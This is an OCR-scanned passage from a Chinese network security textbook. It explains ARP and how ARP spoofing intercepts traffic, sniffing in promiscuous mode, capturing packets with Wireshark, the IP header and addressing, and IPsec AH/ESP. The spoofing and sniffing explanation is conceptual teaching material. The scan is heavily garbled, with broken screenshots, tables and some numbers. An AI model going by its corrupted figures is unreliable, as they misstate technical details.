新 ARP 缓存 表 , 绑 定 主机 和 A 的 IP 地 址 和 MAC 地 址 。 交 换 机 收 到 网 关 对 主机 A 的 ARP 
响应 后 ,查找 它 的 MAC 地 址 和 端口 之 间 的 映射 表 , 转 发 ARP 数据 包 到 相应 端口 。 同 时 , 交 
换 机 更 新 它 的 MAC 地 址 和 端口 之 间 的 映射 表 , 即 将 192. 168. 0. 2 绑 定 它 所 连接 的 端口 。 
主机 A 收 到 ARP 响应 数据 包 , 更 新 ARP 缓存 表 , 绑 定 网 关 的 IP 地址 和 MAC 地 址 。 主 机 
A 使 用 更 新 后 的 MAC 地 址 信息 把 数据 发 送 给 网 关 , 通 信 信 道 就 此 建立 。 

在 ARP 欺骗 的 情况 下 ,攻击 者 必须 诱 使 目标 主机 (192. 168. 0.3) 和 网 关 (192. 168. 0. 2) 和 
它 通信 。 这 样 , 攻 击 者 就 伪装 成 路 由 器 ,使 目标 主机 和 网 关 之 间 所 有 数据 通信 都 经 由 攻击 者 
的 主机 转发 ,攻击 者 就 能 对 数据 进行 随意 处 理 。 

如 果 攻 击 者 执行 两 次 ARP 欺骗 ,打开 两 个 命令 界面 ,就 能 同时 欺骗 目标 主机 和 网 关 。 


QA 网 络 监 听 


以 太 网 的 通信 是 基于 广播 方式 的 ,这 意味 着 在 同一 个 网 段 的 所 有 网 络 接口 都 可 以 访问 
到 物理 媒体 上 传输 的 数据 ,而 每 一 个 网 络 接口 都 有 一 个 唯一 的 硬件 地 址 , 即 MAC 地 址 ,长 
度 48B, 一 般 来 说 每 一 块 网 卡 上 的 MAC 地 址 都 是 不 同 的 。 在 MAC 地 址 和 IP 地 址 间 使 用 
ARP 和 RARP 进行 相互 转换 。 


2.4.1 网 络 监听 原理 


通常 一 个 网 络 接口 只 接收 以 下 两 种 数据 帧 : @ 与 自己 硬件 地 址 相 匹配 的 数据 帧 ; @ 发 
向 所 有 机 器 的 广播 数据 帧 。 

网 卡 负责 数据 的 收发 , 它 接收 传输 来 的 数据 帧 ,然后 网 卡 内 的 单片机 程序 查看 数据 帧 的 
MAC 地 址 ,根据 计算 机 上 的 网 卡 驱动 程序 设置 的 接收 模式 判断 该 不 该 接受 。 如 果 接 受 则 
接收 后 通知 CPU ,否则 丢弃 该 数据 帧 ,所 以 被 丢弃 的 数据 帧 直接 被 网 卡 截断 ,计算 机 根本 不 
知道 。CPU 得 到 中 断 信号 产生 中 断 ,操作 系统 根据 网 卡 的 驱动 程序 设置 的 网 卡 中 断 程序 地 
址 调用 驱动 程序 接收 数据 ,驱动 程序 接收 数据 后 放 入 信号 堆栈 让 操作 系统 处 理 。 网 卡通 党 
有 以 下 4 种 接收 方式 。 

(1) 广播 方式 : 接收 网 络 中 的 广播 信息 。 
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(2) 组 播 方式 : 接收 组 播 数据 。 

(3) 直接 方式 : 只 有 目的 网 卡 才能 接收 该 数据 。 

OD 混杂 方式 : 接收 一 切 通过 它 的 数据 ,而 不 管 该 数据 是 否 传 给 它 。 

以 太 网 的 工作 机 制 是 把 要 发 送 的 数据 包 发 往 连接 在 同一 网 段 中 的 所 有 主机 ,在 包头 中 
包括 有 目标 主机 的 正确 地 址 ,只 有 与 数据 包 中 目标 地 址 相同 的 主机 才能 接收 到 信息 包 。 

图 2-7 是 一 个 简单 的 网 络 连 接 ,机 器 A、B、C 与 集线器 Hub 连接 ,集线器 Hub 通过 路 
由 器 访问 外 部 网 络 。 


图 2-7 简单 的 网 络 连 接 


管理 员 在 机 器 A 上 使 用 FTP 命令 向 机 器 C 进行 远程 登录 ,在 这 个 网 络 中 数据 的 传输 
过 程 是 这 样 的 : 首先 机 器 A 上 的 管理 员 输 入 登录 机 器 C 的 FTP 密码 ,经 过 应 用 层 FTP、 传 
输 层 TCP 网络 层 TP ,数据 链 路 层 上 的 以 太 网 驱动 程序 一 层 一 层 地 包 庄 ,最 后 送 到 物理 层 。 
接 下 来 数据 帧 传输 到 Hub 上 ,然后 由 Hub 向 每 一 个 节点 广播 此 数据 帧 ,机 器 B 接收 到 由 
Hub 广播 发 出 的 数据 帧 ,并 检查 数据 帧 中 的 地 址 是 否 和 自己 的 地 址 匹配 ,结果 不 匹配 , 故 丢 
弃 此 数据 帧 。 而 机 器 C 也 收 到 了 数据 帧 ,并 先进 行 比 较 , 发 现 与 自己 的 地 址 匹配 ,接收 下 来 
并 对 此 数据 帧 进行 分 析 处 理 。 

但 是 当主 机 工作 在 监听 模式 下 时 ,不管 数 据 包 中 的 目标 物理 地 址 是 什么 ,主机 都 可 以 接 
收 到 。 并 且 所 有 收 到 的 数据 帧 都 将 被 交 给 上 层 协议 软件 处 理 。 

早期 的 Hub 是 共享 介质 的 工作 方式 ,只 要 把 主机 网 卡 设置 为 混杂 工作 模式 ,网 络 监 听 
就 可 在 任何 接口 上 实现 。 现 在 的 网 络 基本 都 用 交换 机 ,必须 把 执行 网 络 监听 的 主机 接 在 镜 
像 端 口上 ,才能 监听 到 整个 网 络 交换 机 上 的 网 络 信息 。 这 就 是 网 络 监听 的 基本 原理 。 


2.4.2 网 络 监听 工具 


计算 机 网 络 是 共享 通信 通道 的 ,这 意味 着 计算 机 能 够 接收 到 发 送 给 其 他 计算 机 的 信息 。 
捕获 在 网 络 中 传输 的 数据 信息 就 称 为 窃听 (sniffing) 。 

以 太 网 是 现在 应 用 最 广泛 的 计算 机 连 网 方式 。 以 太 网 协议 的 特点 是 在 同一 网 络 向 所 有 
主机 发 送 数据 包 信息 。 数 据 包 头 包含 有 目标 主机 的 地 址 。 一 般 情况 下 只 有 具有 该 地 址 的 主 
机 会 接收 这 个 数据 包 。 如 果 一 台 主 机 能 够 接收 所 有 数据 包 , 而 不 理会 数据 包头 内 容 , 这 种 方 
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式 通常 称 为 "混杂 ?模式 。 

Wireshark 是 一 款 可 以 运行 在 多 个 操作 系统 平台 上 的 网 络 协议 分 析 工具 软件 。 分 析 工 
有 具 的 主要 作用 是 尝试 捕获 网 络 包 , 并 显示 包 的 尽 可 能 详细 的 情况 。 可 以 把 网 络 包 分 析 工 具 
当成 一 种 用 来 测量 有 什么 东西 从 网 线 上 进出 的 测量 工具 ,就 好 像 电 工 使 用 来 测量 进入 电信 
的 电量 的 电 度 表 一 样 (当然 比 那个 更 高 级 )。 过 去 此 类 工具 要 么 是 过 于 昂贵 ,要 么 是 属于 某 
人 私有 ,或 者 是 二 者 兼顾 。Wireshark 出 现 以 后 ,这 种 现状 得 以 改变 。Wireshark 是 今天 能 
使 用 的 最 好 的 开源 网 络 协 议 分 析 软 件 。 

Wireshark 是 Etheral 更 高 级 的 演进 版 本 ,包含 WinPcap; 通常 运行 在 路 由 器 或 有 路 由 
功能 的 主机 上 ,这 样 就 能 对 大 量 的 数据 进行 监控 ,几乎 能 得 到 以 太 网 上 传送 的 任何 数据 包 。 


2.4.3 Wireshark 简介 


1. Wireshark 安装 


Wireshark 有 Wireshark-win32 fll Wireshark-win64 两 个 版 本 , Wireshark-win32 可 在 
大 多 数 计算 机 系统 上 运行 , Wireshark-win64 必须 安装 在 64 位 CPU 的 计算 机 和 64 位 操作 
系统 才 可 以 。Wireshark-win32 安装 过 程 如 图 2-8 一 图 2-11 所 示 。 
Wireshark 1.5.0 (32-bit) Setup 


Welcome to the Wireshark 1.5.0 
(32-bit) Setup Wizard 


This wizard wil guide you through the instalation of 
Wireshark. 


Before starting the installation, make sure Wireshark is not 
ruming. 


Chck Next to continue. 


图 2-8 Wireshark 安装 第 一 步 


Wireshark 1.5.0 (32-bit) Setup aE 


Choose Components 
Choose which features of Wireshark 1.5.0 (32-bk) you want to install. 国 


The following components are available For installation. 


Select components to install: 


Space required: 74.5MB 


图 2-9 Wireshark 安装 第 二 步 
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Wireshark 0 (32-bit) Setup 区 
Install WinPcap? 
 WinPcap is required to capture live network data. Should WinPcap be installed? a 


Currently installed WinPcap version. 


TOINE 
(Use Add/Remove Programs first to uninstall any undetected old WinPcap versions) 


图 2-10 Wireshark 安装 第 三 步 


Wireshark 1.5.0 (32-bit) Setup 

Completing the Wireshark 1.5.0 
(32-bit) Setup Wizard 

Wireshark 1.5.0 (32-bit) has been installed on your. 
computer, 

Click Finish to dose this wizard. 

Jun Wreshark 1.5.0 (32-5) 


[show News 


图 2-11. Wireshark 安装 完成 


2. Wireshark 应 用 


Wireshark 安装 完成 ,直接 运行 后 显示 图 2-12 所 示 的 界面 ,第 一 行 有 11 个 菜单 ,第 二 行 
有 27 个 图 标 。 


The Wireshark Network Analyzer [Wireshark 1.5.0 (SVH Rev 356... 
File Edit Vier Go Capture Analyze Statistics Telephony Toels Internals Help 


Bassa cuxealeserziE[B eaa» 


"— em 3 


Interface List 5B Open 
IL list oF the captus interfaces Orea a mreviowsly captured file 
[cowats incoming packets) 


Open Recent: 
Start capture on interface: 


E ite sr meric um md entre || Gy Sanple Captures s 
Bf] Intel GO PRO/100 VE Network Connection A rich meeortorst of emple captare files on 


Capture Options 
Start a captare with detailed options 


Jo Packets Profile: Default 


(O| Ready to Load or capture 


图 2-12 Wireshark 运行 界面 
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单 击 第 二 个 图 标 , 显 示 图 2-13 所 示 的 界面 。 在 Capture 选项 组 中 的 Interface 下 拉 列 表 

框 中 ,选择 被 采集 计算 机 的 网 卡 ; 然后 单 击 右 下 角 的 Start 按钮 ,显示 图 2-14 所 示 的 界面 ， 

显示 捕获 的 流 经 网 卡 的 大 量 数据 包 。 在 图 2-14 中 ,第 一 个 窗 格 是 数据 包 列表 窗 格 , 第 二 个 
窗 格 是 数据 包 细 节 窗 格 ,第 三 个 窗 格 是 数据 包 字 节 窗 格 。 


eshark: Capture Options 


Capture 
Interface [me | [Entel 四 PRO/100 VE Network Connection: \Device\NPF_{9120c583-M[= | 
IP address: 192.168. 1.100 
Linklsyer header type: [EU 
Capture packets in promi: 


C Capture packets in peup-ng format (experimental) 


Buffer size: [1 negabytels) 
C] Limit each packet. to [55 bytes - 
[te Filter. (o) [Compile 3er 
Capture File(s) Display Options 
Tile rore... [V] Update list of packets in real time 


D] se multiple files 


t E sf Automatic scrolling in live capture 
P hoo shr E Jide capture info dialog 
E— [Name Resolution 
Stop Capture. Enable MAC nane resolution 
De (50000 0599 (| C Enable petrerk nane resolution 
O... ter |i » 
O- after p [ s 3 Enable transport name resolution 


图 2-13 Wireshark 捕获 数据 包 设置 


File Edit View Go Capture Analyze Statistics Telephony Tools Internals Help 
CR 


Filter | | Expression... 


No. Tine Source Destination Frotocol Length Info 
6 5.001938 192.168.1.100 234.34.23.234 62 Source port: 
113.116.146. 62 192.168.1.100 


E mm 125.120. 161.214 192.168.1. 100 


11 10. 004181 192. 168. 1.100 234.34. 25.234 

12 10.004194  192.168.1.100 234.34.23.234 

13 13.035302  192.168.1.100 192.168.1.1 74 Standard quar 

14 13.057656 192.168.1.1 192.168.1.100 120 standard quer: 

15 13.824326  192.168.1.100 192.168.1.1 71 Standard quer: 

1613 844720 192.168.1.1 .168.1. 114 EL idard quer: 
6 0 E Cp 66 > http [ 


T8 13. 940073 192.168.1.100 220. 181.111.78 66 4468 > http [ 
19 13.973615  220.181.111.78 192.168.1.100 66 http > 4468 [ 
20 13.973714  192.168.1.100 220.181.111.78 54 4468 > http [ 


Œ Frame 17: 66 bytes on wire (528 bits), 66 bytes captured (528 bits) 
& Ethernet II, Src: IntelCor. 85:1f:b7 (00:13:20:85:1f:b7), Dst: Tp-LinkT e4:c8:ce (e0:05:c5:e| 
& Internet Protocol, Src: 192.168.1.100 (192.168.1.100), DSt: 220.181.111.78 (220.181.111.78) 


O| Frane (frane), 66 bytes Packets: 308 Displayed: 308 Marked: 0 … | Profile: Default 


图 2-14. Wireshark 捕获 的 数据 包 
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在 图 2-14 中 的 Filter 下 拉 列 表 框 中 ,输入 需要 过 滤 协 议 ,如 输入 TCP, 显 示 如 图 2-15 
所 示 的 界面 ,只 显示 TCP 数据 包 和 基于 TCP 的 数据 包 , 如 HTTP 数据 包 。 


I 


uawaaalcux2al.eoerzijlEBS|QqQaBwET"E E 
Hilter: [os v|mesemee e oss 


He [tine [Source [Destination [Protocol] [es E 
34.447237 192.168.1.100 222.88.95.137 TCP 54 4420 > http [FIN, ACK] seq-1 Ack-1 win=63825 Len=0 
44.447249 192.168.1.100 222.88.95.137 Tp 54 4420 > http [FIN, ACK] Seq-l Ack-l win=63825 Len=0 

17 13.940056 192.168.1.100 220.181.111.78 TCP 664468 > http [SYN] Seq=0 win-64240 Len=0 MsS-1460 ws-l SA 
1813.940073 192.168.1.100 220.181.111.78 TCP 66 4468 > http [SYN] Seq=0 win-64240 Len=0 MSS-1460 WS=1 SA. 
19 13.973615 220.181.111.78 — 192.168.1.100 T 66 http > 4468 [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS-l. 
2013.973714 192.168.1.100 220.181.111.78 TCP 54 4468 > http [ACK] Seq-l Ack-1 Win=64800 Len=0 


220.181.111.78 543 GET /inages/track.gif7level-1apage-Indexātype-accessěn-L 


HTTP 
220.181.111.174 TCP 66 4469 > http [SYN] Seq-0 Win=64240 Lenc0 MSS=1460 WS- Sh 
220.181.111.174 TCP 66 4469 > http [SYN] Seq=0 Win=64240 Len=0 MSS=1460 WS-l SA. 

TCP 

TCP 

cR 


22 13.975879 192.168.1.100 
B 168.1.100 


27 14.010946 192.168.1.100 220.181.111.174 664470 > http [SYN] Seq-0 win-64240 Len=0 MSS=1460 WS=1 SA. 
28 14.010966 192.168.1.100 220.181.111.174 66 4470 > http [SYN] Seq-0 win«64240 Len=0 MSS=1460 WS«l SA. 


2914.012174 192.168.1.100 220.181.111.174 T 664471 > http [SYN] Seq=0 win«64240 Len=0 MSS«1460 WS=1 SA 


30 14.012187 192.168.1.100 220.181.111.174 — TCP 664471 > http [SYN] Seq=0 Win=64240 Len=0 MSS«1460 WS=1 SA. 

3114.013267 192.168.1.100 220.181.121.78 TCP 664472 > http [SYN] Seq«0 win«64240 Len=0 MSS«1460 Ws«l SA. 

32 14.013279 192.168.1.100 220.181.111.78 TCP 664472 > http [SYN] Seq-0 win«64240 Len=0 MSS«1460 WS=1 SA x| 
1 LE 


g pti 
3 Ethernet. x src: Intelcor.85 :f: uz (00:13:20:85:1f:b7), Dst: EA cB:ce (e0:05:c5:e4:c8:ce) 
|$ Internet Protocol, Src: 192.168.1.100 (192.168.1.100), Dst: 220.181.111.174 (220.181.111.174) 

B 


Source port: 4469 (4469) 
Destination port: http (80) 
[Stream index: 3] 
Sequence number: 0 (relative sequence number) 
Header length: 32 bytes 
日 
= Reserved: Not set 
- Nonce: Not set 
= Congestion window Reduced (CWR): Not set li 
Eom echo not car 


[32838 N- 
010 00 M 2c de 40 00 40 06 00 08 cO a8 0i 
020 6f ae 11 75 00 50 6a 28 e2 ca 00 00 00 
030 fa fO 06 ff 00 00 02 04 05 b4 01 03 03 
O40 04 02 


OFFis reu" 89 RODA) —— [Faats: 308 Displayed: 174 Marked: O Load time 0000) [cei Debit 


du] | ssa Jan Jayme mens. Pss tiens... Ea 
图 2-15 Wireshark 捕获 的 TCP 数据 包 


应 用 Wireshark 分 析 协 议 数据 会 在 后 面 的 章节 中 详细 介绍 。 


8.5 TCP/IP & IP 安全 机 制 
w 


因特网 上 所 存在 的 安全 漏洞 ,多 数 与 网 络 协议 的 本 身 设计 缺陷 有 关 。 为 了 进一步 了 解 
产生 安全 缺陷 的 原因 ,有 必要 介绍 TCP/IP 的 数据 包 格式 及 其 工作 原理 。 


2.5.1 IP 数 据 包 格式 


TCP/IP 定 义 了 一 个 在 因特网 上 传输 的 包 , 称 为 PP 数据 包 。IP 数据 包 由 首部 和 数据 
构成 。 首 部 有 20B 的 固定 长 度 和 一 个 可 选项 ,可 选项 长 度 不 定 ,最 长 为 60B, 如 图 2-16 
所 示 。 

IP 数据 包 的 头 部 包含 了 实现 IP 层 功能 所 需要 的 一 系列 信息 。 

“版 本 ”字段 记录 数据 包 属 于 哪个 版 本 的 协议 以 便 在 不 同 版 本 间 传 输 数 据 。“ 首 部 长 度 ” 
字段 指明 首部 长 度 ， 最 短 为 20B, 最 长 为 60B(15X32b)。“ 区 分 服务 ”字段 指明 主机 要 求 子 
网 提供 的 服务 。 该 字段 包括 3 位 优先 级 ; 3 位 标志 位 D. T, R (delay, throughput, 
reliability), 分 别 表示 延迟 .吞吐 量 .可 靠 性 ; 最 后 2 位 未 用 。“ 总 长 度 ” 字 段 指 明 首部 和 数据 
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立 0 4 8 16 — 19 24 3 
版 本 “| 省 部 长 度 | 。 区 分 服务 总 长 度 
a 标识 标志 KRB 
Hip tum 协议 首部 校 验 和 
ii 源 地 址 
e 目的 地 直 
kis TEFEK D 
数据 部 分 


图 2-16 了 数据 包 格式 


的 实际 长 度 ,最 长 为 65 535B。“ 标 识字 段 用 来 让 目的 主机 判别 新 来 的 分 段 属于 哪个 分 组 。 
“标志 ?字段 有 3 位 。 第 一 位 未 用 ; 第 二 位 代表 不 能 分 段 , 称 为 DF fi (Don't fragment), K 
为 目的 端 不 会 重组 分 段 ; 第 三 位 代表 还 有 分 段 , 称 为 MF 位 (more fragments) 。 除 了 最 后 一 
个 分 段 外 ,其 余 分 段 都 应 设置 。“ 片 偏 移 "字段 指明 分 段 在 当前 数据 报 的 什么 位 置 。 由 于 基 
本 分 段 单 位 为 8B, 每 个 数据 报 最 长 为 分 段 偏 移 值 乘 8, 即 283X8=8192X8=65 536B, 比 “总 
长 度 " 字 有 段 提 供 的 最 大 值 还 长 。“ 生 存 时 间 ” 字 段 是 一 个 限制 分 组 生命 周期 的 计数 器 ,最 长 为 
2 一 1 二 255, 当 计数 值 为 0 时 ,分 组 被 丢弃 并 向 主机 报警 。“ 协 议 " 字 段 指明 将 分 组 传 给 哪个 
进程 ,是 TCP 还 是 UDP 或 其 他 类 型 。“ 首 部 校 验 和 ”字段 仅 用 来 校 验 首部 数据 是 否 正 确 , 当 
校 验 值 为 0 时 ,表明 数据 正确 。 
图 2-17 显示 采集 的 IP 数据 包 首部 的 每 一 个 字段 的 值 。 


Eile Edit View Go Capture Analyze Statistics Telephony Tools Int 


CC 


s Hep 
&«aamazmxig 


Filter | 司 Expression... Clesr Apply 
No. Time _ Sowce 0 Destination Protocol Length Info —— 00 EN-| 
AR a 
a ] i 
E Internet Protocol, Src: 220.181.111.120 (220.181.111.120), Dst: 192.168.1.100 (192.168.1.100) A| 
version: 4 E| 
Header length: 20 bytes 
B Differentiated services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00: Not-ECT (Not ECN-Capable Transport)) 
0000 00.. = Differentiated Services Codepoint: Default (0x00) 
PAR 00 = Explicit Congestion Notification: Not-ECT (Not ECN-Capable Transport) (0x00) 
Total Length: 567 
Identification: Ox3c72 (15474) 
E Flags: 0x02 (Don't Fragment) 
0... .... = Reserved bit: Not set 
de = Don't fragment: Set 


».0. s... = More fragments: Not set 
Fragment offset: 0 
Time to live: 52 
Protocol: TCP (6) 
i Header checksum: Oxfal4 [correct] 
[Good: True] 
[Bad: False] 
Source: 220.181.111.120 (220.181.111.120) 
Destination: 192.168.1.100 (192.168.1.100) v| 
r 图 
(0000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d  HTTP/1.1 200 Ok. ^ 
(0010 Oa 6d 65 64 69 61 3a 20 6d 65 64 69 61 0d 0a 43  .media: media..C - 
|D020 61 63 68 65 2d 43 6f ée 74 72 6f 6c 3a 20 éd 61 ache-Con trol: ma - 
0030 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 Od 0a Xx-age=31 536000.. *| 
Frane (58i bytes)| Reassenbled TCP (10807 bytes) | 


| File: “C:\Documents and Settings\Adnine | Packets: 308 Displayed: 308 Marked: 0 Load time: 0:0- | 了 ofile- Default 


图 2-17 IP 数 据 包 首 部 字段 
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IP 首部 最 后 一 行 是 “可 选 和 填充 ”, 它 允许 后 续 版 本 的 协议 加 入 新 的 内 容 。 目 前 有 5 个 
可 选项 。 

(1)“ 安 全 性 (security) ”选项 说 明 信 息 的 机 密 程度 。 

(2)“ 严 格 的 源 路 由 选择 (Strict Source Routing)? 选 项 以 一 系列 的 IP 地址 方式 ,给 出 从 
源 到 目的 地 的 完整 路 径 , 数 据 报 必须 严格 地 从 这 条 路 径 传 送 。 当 路 由 选择 表 崩 溃 时 ,该 字段 
提供 管理 员 发 送 紧 急 分 组 或 作 时 间 测 量 用 。 

(3)“ 宽 松 的 源 路 由 选择 (Loose Source Routing) ”选项 要 求 数据 包 以 指定 的 次 序 遍 历 
所 列 的 路 由 器 ,但 也 可 以 穿越 其 他 路 由 器 。 这 个 选项 方便 确定 特殊 的 路 径 。 

(4)“ 记 录 路 由 (Record Route) ?选项 让 沿途 的 路 由 器 都 将 IP 地 址 加 到 可 选 字段 之 后 ， 
以 便 跟踪 路 由 选择 算法 的 错误 。 

(5)“ 时 间 戳 (Time Stamp) ”选项 使 每 个 路 由 器 都 附 上 它 的 IP 地 址 和 时 间 标 记 , 以 便 更 
好 地 为 路 由 选择 算法 查 错 。 

由 上 述 5 个 选项 可 以 看 出 ,IP 是 一 个 无 连接 、 无 可 靠 保证 的 网 络 协议 。 所 谓 “ 安 全 性 ” 
选项 ,只 是 说 明 信 息 的 机 密 性 而 非 保 证 信息 的 安全 传送 。 至 于 “严格 的 源 路 由 选择 ”“ 宽 松 
的 源 路 由 选择 “记录 路 由 ”和 “时间 戳 ” 等 选项 ,都 是 为 了 保证 选择 某 个 路 由 方便 传送 ,或 者 
是 系统 能 有 效 地 跟踪 路 由 选择 算法 ,以 保证 所 发 送 的 数据 包 和 接收 的 数据 包 的 完整 性 。 实 
际 上 ,IP 报 头 的 几 个 字段 的 设置 ,例如 “标识 符 ” 字 段 “ 标 志 ” 字 段 和 “ 片 偏 移 " 字 段 , 都 是 为 
了 数据 包 的 分 段 和 重组 而 设计 的 。 每 个 网 络 都 有 一 个 分 组 的 最 大 长 度 限制 。 最 大 有 效 载荷 
字段 从 ATM 网 的 48B 到 因特网 的 65 515B(IP 分 组 ) 都 有 。 互 联网 的 路 由 选择 算法 应 该 避 
免 分 组 穿越 不 能 控制 它 的 网 络 ,这 就 是 将 分 组 划分 为 片 (fragment) ,把 各 片 作为 单独 的 因 特 
网 分 组 发 送 的 原因 。 然 后 ,IP 又 能 通过 中 间 的 一 个 或 多 个 网 关 , 实 现 从 源 网 络 到 目的 网 络 
的 路 由 选择 、 分 片 重组 。 最 终 实 现 数据 报 的 无 连接 传送 。 


2.5.2 IP 地 址 及 其 管理 


目前 使 用 的 IPv4 协议 规定 : IP 地 址 的 长 度 为 4B, 整 个 地 址 分 为 两 部 分 ,网 络 号 和 主机 
号 。IP 地 址 分 为 A、B、C、D 和 下 类 ,标识 网 络 的 最 高 几 位 分 别 是 0、10、110、1110 和 11110. 
除 D 类 、 上 类 保留 外 ,常用 的 ABC 三 类 地 址 格式 如 图 2-18 所 示 。 


A 类 地 址 | 0 网 络 号 主机 号 | 
B 类 地 址 | 10 网 络 号 | sms | 
C 类 地 址 [ riot ans |] 


图 2-18 A、B.C 类 IP 地 址 结构 


A 类 地 址 的 范围 为 1. 0. 0. 0~ 127. 255. 255. 255; B 类 地 址 的 范围 为 128. 0. 0. 0~ 
191. 255. 255. 255; C 类 地 址 的 范围 为 192. 0. 0. 0~223. 255. 255. 255。 在 IP 地 址 中 ,有 几 
个 IP 地址 具有 特殊 意义 ,不 能 分 配给 站 点 。 这 些 地 址 包括 : 主机 号 为 全 “0” 的 IP 地 址 是 网 
络 地 址 ,如 129.1.0.0 表示 它 是 一 个 了 类 网 络 的 网 络 地 址 ; 主机 号 为 全 “1” 的 IP 地 址 是 广 
播 地 址 ,如 129. 1. 255. 255 表示 网 络 号 为 129. 1 的 所 有 主机 都 能 接收 到 IP 分 组 ; 以 “0” 作 


25 


s 


26 


Au 


网 络 安全 技术 


网 络 号 的 IP 地 址 代表 当前 网 络 ; 所 有 127. xx. yy. zz 的 IP 地址 保留 作 回 路 测试 (loopback); 
网 络 号 为 全 “0” 或 全 “1” 的 IP 地 址 也 被 保留 。 

在 因特网 中 ,每 个 网 络 的 网 络 号 应 当 彼此 不 同 ,以 便 区 分 是 哪个 网 络 。 在 同一 个 网 络 中 
的 主机 ,网 络 号 必须 相同 ,但 主机 号 不 同 。 当 网 络 增 大 到 一 定 规模 时 ,IP 地 址 的 编 址 特性 将 
产生 问题 。 例 如 ,一 家 公司 有 一 个 C 类 局 域 网 , 当 它 的 机 器 超过 254 台 时 ,又 需要 另 一 个 C 
类 局 域 网 ,多 个 局 域 网 需要 通过 路 由 器 连接 。 

每 次 安装 新 网 络 时 ,系统 管理 员 就 得 申请 新 的 网 络 号 。 将 机 器 从 一 个 局 域 网 上 移 到 另 
一 个 局 域 网 上 ,也 要 更 改 IP 地 址 ,修改 配置 文件 。 如 果 新 的 机 器 用 上 老 机 器 的 IP 地址 , 电 
子 邮件 和 其 他 数据 的 传送 将 引起 混乱 。 为 避免 混乱 现象 产生 ,应 引入 子 网 和 子 网 屏蔽 码 的 
概念 。 如 果 某 个 网 络 扩大 的 公司 开始 用 B 类 地 址 代替 C 类 地 址 , 则 可 以 尝试 把 16 位 主机 
号 分 成 一 个 6 位 的 子 网 号 和 一 个 10 位 的 主机 号 ,如 图 2-19 所 示 。 


os 子 网 号 | 。 主机 号 
子 网 屏 项 11 11 11 11 11 11 11 11 11 11 11 00 00 00 00 00 
JM a J 

1647717 6T" 10470" 


图 2-19 B 类 网 络 分 成 若干 子 网 


在 网 络 外 部 , 子 网 是 不 可 见 的 ,因此 分 配 一 个 新 子 网 不 必 与 因特网 网 络 信息 中 心 
(InterNIC) 联 系 或 改变 程序 外 部 数据 库 。 现 在 ,假定 第 一 个 子 网 使 用 130. 50. 4. 1 开始 的 IP 
地 址 ,第 二 个 子 网 使 用 130. 50. 8.1 开始 的 1P 地 址 ,以 此 类 推 。 原 有 的 路 由 表 则 应 作 相 应 的 
变化 。 加 入 一 些 项 目 ( 如 “当前 网 络 , 子 网 ,0” 和 “当前 网 络 , 当 前 子 网 ,主机 ”), 让 每 个 路 由 器 
与 网 络 的 子 网 掩 码 (subnet mask) 作 一 个 布尔 与 运算 ,以 除去 主机 号 ,并 在 表 中 查 出 所 得 的 
地 址 。 


2.5.3 ”IP 安全 机 制 


针对 TCP/IP 的 层次 结构 及 安全 缺陷 ,IETF 已 对 IP 安全 协议 (IPSec) 和 因特网 密 钥 管 
理 协 议 (IKMP) 进 行 标准 化 工作 。IPSec 的 主要 目的 是 使 需要 安全 措施 的 用 户 能 够 使 用 相 
应 的 加 密 安全 体制 ,该 体制 不 仅 在 IPv4 下 工作 ,也 可 在 IPv6 下 工作 。 这 个 安全 体制 的 主要 
内 容 是 在 TP 数据 包 的 首部 增设 身份 验证 头 (AH) 和 封装 安全 有 效 载荷 (ESP) 。AH 提供 IP 
数据 包 的 真实 性 和 完整 性 ,ESP 提供 数据 包 的 机 密 性 。 


1. 身份 验证 头 


身份 验证 头 (authentication header. AH) 信 息 紧 跟 在 IPv4 头 之 后 ,如 图 2-20 所 示 。 
AH 包含 下 一 个 首部 、 有 效 载荷 长 度 \ 保 留 、 安 全 参数 指针 (SPT) ,序列 号 字段 以 及 验证 数据 
等 信息 。 

在 图 2-20 中 ,所 有 字段 都 是 必需 的 。“ 下 一 个 首部 ?字段 表示 AH 后 面 下 一 个 有 效 字段 
的 类 型 (如 TCP 或 UDP)。“ 有 效 载荷 长 度 ? 字 段 表 示 的 是 32 位 字 ( 减 2) 中 AH 的 长 度 。 
“保留 ?字段 为 将 来 扩展 功能 而 保留 。“ 安 全 系数 指针 (SPI) ?字段 表示 一 个 32 位 的 参数 值 ， 
该 值 与 卫 数据 包 的 目的 地 址 相 结合 ,为 所 有 有 效 的 IP 数据 包 决 定安 全 关联 (SA) 及 其 安全 
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上 层 协议 (TCP 
e AH 或 UDP) 


下 一 个 首部 | 有 效 载荷 长 度 | 保留 
安全 参数 指针 (SPD 
序列 号 字段 
验证 数据 (32 位 的 整数 倍 ) 


图 2-20 使 用 认证 头 AH 的 全 数据 包 


设置 数据 。 

在 双向 连接 中 ,每 个 方向 都 要 建立 一 个 单独 的 SA, 它 为 不 同方 向 上 的 各 种 服务 选择 安 
全 的 密码 算法 及 密 钥 提供 灵活 性 。SA 有 两 种 模式 : 传输 模式 和 隧道 模式 ,传输 模式 是 两 个 
主机 之 间 的 安全 关联 ,隧道 模式 是 安全 网 关 与 安全 网 关 之 间 的 安全 关联 。 安 全 网 关 可 用 做 
防火 墙 ,以 确保 IP 数据 包 的 安全 。 

32 位 “序列 号 字段 ”包含 一 个 单调 递增 的 序列 , 当 SA 建立 时 ,发 送 方 与 接收 方 的 计数 
值 均 置 为 零 。 如 果 要 求实 现 重 放 保 护 , 接 收 方 必须 检查 每 个 IP 数据 包 的 序列 号 , 且 序 列 号 
必须 是 非 循环 的 。 这 样 ,在 一 个 SA 内 ,传输 的 IP 数据 包 数 量 不 能 大 于 232。 

“验证 数据 ?字段 的 长 度 可 变 , 包 括 TP 数据 包 的 完整 性 检测 值 (ICV) ,这 个 字段 包括 填 
充值 以 保证 认证 头 (AH) 是 32 位 的 整数 倍 。 验 证 数据 是 使 用 某 种 散 列 算法 进行 计算 的 ,其 
中 常见 的 有 MD5 和 SHA 一 1 两 种 算法 。 这 些 算法 具有 不 可 逆转 性 : 不 可 能 从 计算 结果 推 
导出 它 的 原始 输入 数据 ,不 可 能 从 给 定 一 份 数据 及 其 经 散 列 算法 计算 的 结果 找到 另外 一 份 
数据 产生 结果 的 方法 。 散 列 算法 的 特点 是 使 攻击 者 难以 伪造 数据 包 。 


2. 封装 安全 有 效 载荷 
图 2-21 所 示 为 IP 数据 包 封 装 安全 有 效 载 荷 (Encapsulating Security Payload, ESP) 。 


X 安全 参数 指针 (SPD) 

X 序列 号 字段 

